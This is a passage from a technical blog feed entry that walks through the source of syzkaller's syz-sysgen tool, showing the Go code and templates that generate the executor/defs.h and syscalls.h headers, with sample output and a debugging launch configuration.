<span class="keyword">range</span> syscalls &#123;</span><br><span class="line">    <span class="keyword">var</span> attrVals []<span class="type">uint64</span></span><br><span class="line">    attrs := reflect.ValueOf(c.Attrs)</span><br><span class="line">    last := <span class="number">-1</span></span><br><span class="line">    <span class="keyword">for</span> i := <span class="number">0</span>; i &lt; attrs.NumField(); i++ &#123;</span><br><span class="line">        attr := attrs.Field(i)</span><br><span class="line">        val := <span class="type">uint64</span>(<span class="number">0</span>)</span><br><span class="line">        <span class="keyword">switch</span> attr.Type().Kind() &#123;</span><br><span class="line">            <span class="keyword">case</span> reflect.Bool:</span><br><span class="line">            <span 
class="keyword">if</span> attr.Bool() &#123;</span><br><span class="line">                val = <span class="number">1</span></span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">case</span> reflect.Uint64:</span><br><span class="line">            val = attr.Uint()</span><br><span class="line">            <span class="keyword">default</span>:</span><br><span class="line">            <span class="built_in">panic</span>(<span class="string">&quot;unsupported syscall attribute type&quot;</span>)</span><br><span class="line">        &#125;</span><br><span class="line">        attrVals = <span class="built_in">append</span>(attrVals, val)</span><br><span class="line">        <span class="keyword">if</span> val != <span class="number">0</span> &#123;</span><br><span class="line">            last = i</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    data.Calls = <span class="built_in">append</span>(data.Calls, newSyscallData(target, c, attrVals[:last+<span class="number">1</span>]))</span><br><span class="line">&#125;</span><br><span class="line">sort.Slice(data.Calls, <span class="function"><span class="keyword">func</span><span class="params">(i, j <span class="type">int</span>)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> data.Calls[i].Name &lt; data.Calls[j].Name</span><br><span class="line">&#125;)</span><br><span class="line"><span class="keyword">return</span> data</span><br></pre></td></tr></table></figure><p>Here is an example of what the data variable holds:</p><p><img src="/2022/03/syzkaller-1/image-20220309214932071.png" alt="image-20220309214932071"></p><p>The SyscallAttrs struct is defined as follows:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// SyscallAttrs represents call attributes in syzlang.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// This structure is the source of truth for the all other parts of the system.</span></span><br><span class="line"><span class="comment">// pkg/compiler uses this structure to parse descriptions.</span></span><br><span class="line"><span class="comment">// syz-sysgen uses this structure to generate code for executor.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Only bool&#x27;s and uint64&#x27;s are currently supported.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// See docs/syscall_descriptions_syntax.md for description of individual attributes.</span></span><br><span class="line"><span class="keyword">type</span> SyscallAttrs <span class="keyword">struct</span> &#123;</span><br><span class="line">    Disabled      <span class="type">bool</span></span><br><span class="line">    Timeout       <span class="type">uint64</span></span><br><span class="line">    ProgTimeout   <span class="type">uint64</span></span><br><span class="line">    IgnoreReturn  <span class="type">bool</span></span><br><span class="line">    BreaksReturns <span class="type">bool</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>As the screenshot above shows, every field of the SyscallAttrs struct being visited (the variable attrs) holds its default value 0, so the elements of the resulting Attrs 
array are all 0 as well:</p><p><img src="/2022/03/syzkaller-1/image-20220309215426959.png" alt="image-20220309215426959"></p><p>On each iteration the loop appends the SyscallData for the current syscall to <code>data.Calls</code>. The SyscallData struct produced by <code>newSyscallData</code> is defined as follows:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sys/syz-sysgen/sysgen.go</span></span><br><span class="line"><span class="keyword">type</span> SyscallData <span class="keyword">struct</span> &#123;</span><br><span class="line">    Name     <span class="type">string</span>      <span class="comment">// call name in syzlang, e.g. accept$inet</span></span><br><span class="line">    CallName <span class="type">string</span>      <span class="comment">// actual syscall name, e.g. accept</span></span><br><span class="line">    NR       <span class="type">int32</span>       <span class="comment">// syscall number, e.g. 30</span></span><br><span class="line">    NeedCall <span class="type">bool</span>        <span class="comment">// flag used later when generating the syz-executor source; covered below</span></span><br><span class="line">    Attrs    []<span class="type">uint64</span>    <span class="comment">// SyscallAttrs values produced by analyzing syzlang</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Once the loop finishes, generateExecutorSyscalls sorts the data.Calls slice by name and returns data.</p><h3 id="4-writeExecutorSyscalls">4. 
writeExecutorSyscalls</h3><p>Purpose: this function generates the C header files used by syz-executor.</p><p>Reading through the code, it is easy to see that the function fills in two C code templates and writes the resulting C code to <code>executor/defs.h</code> and <code>executor/syscalls.h</code>.</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">writeExecutorSyscalls</span><span class="params">(data *ExecutorData)</span></span> &#123;</span><br><span class="line">    osutil.MkdirAll(filepath.Join(*outDir, <span class="string">&quot;executor&quot;</span>))</span><br><span class="line">    sort.Slice(data.OSes, <span class="function"><span class="keyword">func</span><span class="params">(i, j <span class="type">int</span>)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> data.OSes[i].GOOS &lt; data.OSes[j].GOOS</span><br><span class="line">    &#125;)</span><br><span class="line">    buf := <span class="built_in">new</span>(bytes.Buffer)</span><br><span class="line">    <span class="keyword">if</span> err := defsTempl.Execute(buf, data); err != <span class="literal">nil</span> &#123;</span><br><span class="line">        tool.Failf(<span class="string">&quot;failed to execute defs template: %v&quot;</span>, err)</span><br><span class="line">    &#125;</span><br><span class="line">    writeFile(filepath.Join(*outDir, <span class="string">&quot;executor&quot;</span>, 
<span class="string">&quot;defs.h&quot;</span>), buf.Bytes())</span><br><span class="line">    buf.Reset()</span><br><span class="line">    <span class="keyword">if</span> err := syscallsTempl.Execute(buf, data); err != <span class="literal">nil</span> &#123;</span><br><span class="line">        tool.Failf(<span class="string">&quot;failed to execute syscalls template: %v&quot;</span>, err)</span><br><span class="line">    &#125;</span><br><span class="line">    writeFile(filepath.Join(*outDir, <span class="string">&quot;executor&quot;</span>, <span class="string">&quot;syscalls.h&quot;</span>), buf.Bytes())</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>其中，defsTempl 代码模板如下：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> defsTempl = template.Must(template.New(<span class="string">&quot;&quot;</span>).Parse(<span class="string">`// AUTOGENERATED 
FILE</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">struct call_attrs_t &#123; &#123;&#123;range $attr := $.CallAttrs&#125;&#125;</span></span><br><span class="line"><span class="string">    uint64_t &#123;&#123;$attr&#125;&#125;;&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">&#125;;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">struct call_props_t &#123; &#123;&#123;range $attr := $.CallProps&#125;&#125;</span></span><br><span class="line"><span class="string">    &#123;&#123;$attr.Type&#125;&#125; &#123;&#123;$attr.Name&#125;&#125;;&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">&#125;;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">#define read_call_props_t(var, reader) &#123; \&#123;&#123;range $attr := $.CallProps&#125;&#125;</span></span><br><span class="line"><span class="string">    (var).&#123;&#123;$attr.Name&#125;&#125; = (&#123;&#123;$attr.Type&#125;&#125;)(reader); \&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;range $os := $.OSes&#125;&#125;</span></span><br><span class="line"><span class="string">#if GOOS_&#123;&#123;$os.GOOS&#125;&#125;</span></span><br><span class="line"><span class="string">#define GOOS &quot;&#123;&#123;$os.GOOS&#125;&#125;&quot;</span></span><br><span class="line"><span class="string">&#123;&#123;range $arch := $os.Archs&#125;&#125;</span></span><br><span class="line"><span class="string">#if GOARCH_&#123;&#123;$arch.GOARCH&#125;&#125;</span></span><br><span class="line"><span class="string">#define GOARCH &quot;&#123;&#123;.GOARCH&#125;&#125;&quot;</span></span><br><span 
class="line"><span class="string">#define SYZ_REVISION &quot;&#123;&#123;.Revision&#125;&#125;&quot;</span></span><br><span class="line"><span class="string">#define SYZ_EXECUTOR_USES_FORK_SERVER &#123;&#123;.ForkServer&#125;&#125;</span></span><br><span class="line"><span class="string">#define SYZ_EXECUTOR_USES_SHMEM &#123;&#123;.Shmem&#125;&#125;</span></span><br><span class="line"><span class="string">#define SYZ_PAGE_SIZE &#123;&#123;.PageSize&#125;&#125;</span></span><br><span class="line"><span class="string">#define SYZ_NUM_PAGES &#123;&#123;.NumPages&#125;&#125;</span></span><br><span class="line"><span class="string">#define SYZ_DATA_OFFSET &#123;&#123;.DataOffset&#125;&#125;</span></span><br><span class="line"><span class="string">#endif</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">#endif</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">`</span>))</span><br></pre></td></tr></table></figure><p>The template is somewhat hard to read because it mixes C macro definitions with template directives, so let's look directly at the generated code in <code>executor/defs.h</code>:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span 
class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// AUTOGENERATED FILE</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">call_attrs_t</span> &#123;</span> </span><br><span class="line">    <span class="type">uint64_t</span> disabled;</span><br><span class="line">    <span class="type">uint64_t</span> timeout;</span><br><span class="line">    <span class="type">uint64_t</span> prog_timeout;</span><br><span class="line">    <span class="type">uint64_t</span> ignore_return;</span><br><span class="line">    
<span class="type">uint64_t</span> breaks_returns;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">call_props_t</span> &#123;</span> </span><br><span class="line">    <span class="type">int</span> fail_nth;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> read_call_props_t(var, reader) &#123; \</span></span><br><span class="line"><span class="meta">    (var).fail_nth = (int)(reader); \</span></span><br><span class="line"><span class="meta">&#125;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOOS_akaros</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOOS <span class="string">&quot;akaros&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOARCH_amd64</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOARCH <span class="string">&quot;amd64&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_REVISION <span class="string">&quot;361c8bb8e04aa58189bcdd153dc08078d629c0b5&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_FORK_SERVER 1</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_SHMEM 0</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_PAGE_SIZE 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_NUM_PAGES 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> 
SYZ_DATA_OFFSET 536870912</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">    ...</span><br><span class="line">        </span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOOS_linux</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOOS <span class="string">&quot;linux&quot;</span></span></span><br><span class="line">   ...</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOARCH_amd64</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOARCH <span class="string">&quot;amd64&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_REVISION <span class="string">&quot;e61403f96ca19fc071d8e9c946b2259a2804c68e&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_FORK_SERVER 1</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_SHMEM 1</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_PAGE_SIZE 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_NUM_PAGES 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_DATA_OFFSET 536870912</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    ...</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    ...</span><br><span class="line">        </span><br><span class="line"><span class="meta">#<span 
class="keyword">if</span> GOOS_windows</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOOS <span class="string">&quot;windows&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOARCH_amd64</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOARCH <span class="string">&quot;amd64&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_REVISION <span class="string">&quot;8967babc353ed00daaa6992068d3044bad9d29fa&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_FORK_SERVER 0</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_SHMEM 0</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_PAGE_SIZE 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_NUM_PAGES 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_DATA_OFFSET 536870912</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>As you can see, syz-sysgen exports the ArchData struct data produced earlier by the <code>generateExecutorSyscalls</code> function to the executor/defs.h file, for use when syz-executor is compiled later. syz-sysgen writes the ArchData for every OS and every architecture into a single file and uses macros to select which part of the data is enabled.</p><p>The other code template, syscallsTempl, is as follows:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// nolint: lll</span></span><br><span class="line"><span class="keyword">var</span> syscallsTempl = template.Must(template.New(<span class="string">&quot;&quot;</span>).Parse(<span class="string">`// AUTOGENERATED FILE</span></span><br><span class="line"><span class="string">// clang-format off</span></span><br><span class="line"><span class="string">&#123;&#123;range $os := $.OSes&#125;&#125;</span></span><br><span class="line"><span class="string">#if GOOS_&#123;&#123;$os.GOOS&#125;&#125;</span></span><br><span class="line"><span class="string">&#123;&#123;range $arch := $os.Archs&#125;&#125;</span></span><br><span class="line"><span class="string">#if GOARCH_&#123;&#123;$arch.GOARCH&#125;&#125;</span></span><br><span class="line"><span class="string">const call_t syscalls[] = &#123;</span></span><br><span class="line"><span class="string">&#123;&#123;range $c := $arch.Calls&#125;&#125;    &#123;&quot;&#123;&#123;$c.Name&#125;&#125;&quot;, &#123;&#123;$c.NR&#125;&#125;&#123;&#123;if or $c.Attrs $c.NeedCall&#125;&#125;, &#123; &#123;&#123;- range $attr := $c.Attrs&#125;&#125;&#123;&#123;$attr&#125;&#125;, &#123;&#123;end&#125;&#125;&#125;&#123;&#123;end&#125;&#125;&#123;&#123;if $c.NeedCall&#125;&#125;, (syscall_t)&#123;&#123;$c.CallName&#125;&#125;&#123;&#123;end&#125;&#125;&#125;,</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;&#125;;</span></span><br><span class="line"><span class="string">#endif</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">#endif</span></span><br><span 
class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">`</span>))</span><br></pre></td></tr></table></figure><p>乍看上去还是有点难懂，我们不妨看看 <code>executor/syscalls.h</code> 示例：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOOS_linux</span></span><br><span class="line">...</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOARCH_amd64</span></span><br><span class="line"><span class="type">const</span> <span class="type">call_t</span> syscalls[] = &#123;</span><br><span class="line">    &#123;<span class="string">&quot;accept&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$alg&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$ax25&quot;</span>, 
<span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$inet&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$inet6&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$netrom&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$nfc_llcp&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    ....,</span><br><span class="line">    &#123;<span class="string">&quot;bind&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$802154_dgram&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$802154_raw&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$alg&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$ax25&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$bt_hci&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$bt_l2cap&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    ....</span><br><span class="line">    &#123;<span class="string">&quot;prctl$PR_CAPBSET_DROP&quot;</span>, <span class="number">167</span>, &#123;<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, &#125;&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;prctl$PR_CAPBSET_READ&quot;</span>, <span class="number">167</span>, 
&#123;<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, &#125;&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;prctl$PR_CAP_AMBIENT&quot;</span>, <span class="number">167</span>, &#123;<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, &#125;&#125;,</span><br><span class="line">    ....</span><br><span class="line">&#125;;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">...</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>As you can see, <code>executor/syscalls.h</code> stores <strong>the mapping between each syscall name declared in syzlang and its syscall number</strong>, along with any accompanying <strong>SyscallData</strong> attributes. As before, macros control <strong>which OS and which Arch's syscalls mapping</strong> is used.</p><blockquote><p>For reference, here is the SyscallData struct definition again:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">type</span> SyscallData <span class="keyword">struct</span> &#123;</span><br><span class="line">    Name     <span class="type">string</span></span><br><span class="line">    CallName <span class="type">string</span></span><br><span class="line">    NR       <span class="type">int32</span></span><br><span class="line">    NeedCall <span class="type">bool</span></span><br><span class="line">    Attrs    []<span class="type">uint64</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></blockquote><h3 
id="5-小结">5. Summary</h3><p>After syz-extract has generated a constant-mapping <code>.const</code> file for each syzlang file, syz-sysgen uses those mappings to fully parse the syzlang sources and obtain the type information and syscall argument dependencies declared in them.</p><p>Once all of this information has been collected, syz-sysgen serializes it into Go files for later use by syz-fuzzer. In addition, syz-sysgen creates executor/defs.h and executor/syscalls.h, exporting part of the information to C header files for use when syz-executor is compiled.</p><p>In short, syz-sysgen parses the syzlang files and prepares everything needed to build and run syz-fuzzer and syz-executor.</p><p>The vscode launch.json file used for debugging:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;version&quot;</span><span class="punctuation">:</span> <span class="string">&quot;0.2.0&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;configurations&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;syzgenLaunch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;go&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;request&quot;</span><span 
class="punctuation">:</span> <span class="string">&quot;launch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;mode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;auto&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;program&quot;</span><span class="punctuation">:</span> <span class="string">&quot;$&#123;fileDirname&#125;&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;env&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;cwd&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/syzkaller&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;args&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">&quot;-src&quot;</span><span class="punctuation">,</span> <span class="string">&quot;/usr/class/syzkaller&quot;</span><span class="punctuation">,</span> <span class="string">&quot;-out&quot;</span><span class="punctuation">,</span> <span class="string">&quot;/tmp&quot;</span><span class="punctuation">]</span> </span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/google/syzkaller&quot;&gt;syzkaller&lt;/a&gt; 是 google 开源的一款无监督覆盖率引导的 kernel fuzzer，支持包括 Linux、Windows 等操作系统的测试。&lt;/p&gt;
&lt;p&gt;syzkaller 有很多个部件。其中：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;syz-extract：用于解析 syzlang 中的常量&lt;/li&gt;
&lt;li&gt;syz-sysgen：用于解析 syzlang，提取其中描述的 syscall 和参数类型，以及参数依赖关系&lt;/li&gt;
&lt;li&gt;syz-manager：用于启动与管理 syzkaller&lt;/li&gt;
&lt;li&gt;syz-fuzzer：实际在 VM 中运行的 fuzzer&lt;/li&gt;
&lt;li&gt;syz-executor：实际在 VM 中运行的测试程序&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;架构图如下：&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/2022/03/syzkaller-1/process_structure.png&quot; alt=&quot;syzkaller 的进程结构&quot;&gt;&lt;/p&gt;
&lt;p&gt;在本文中，我将先介绍 &lt;strong&gt;syz-extract 和 syz-sysgen&lt;/strong&gt; 的源码。&lt;/p&gt;</summary>
    
    
    
    
    <category term="syzkaller" scheme="https://kiprey.github.io/tags/syzkaller/"/>
    
  </entry>
  
  <entry>
    <title>Miscellaneous Paper Notes - 1</title>
    <link href="https://kiprey.github.io/2022/03/other_paper_notes/"/>
    <id>https://kiprey.github.io/2022/03/other_paper_notes/</id>
    <published>2022-03-06T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.061Z</updated>
    
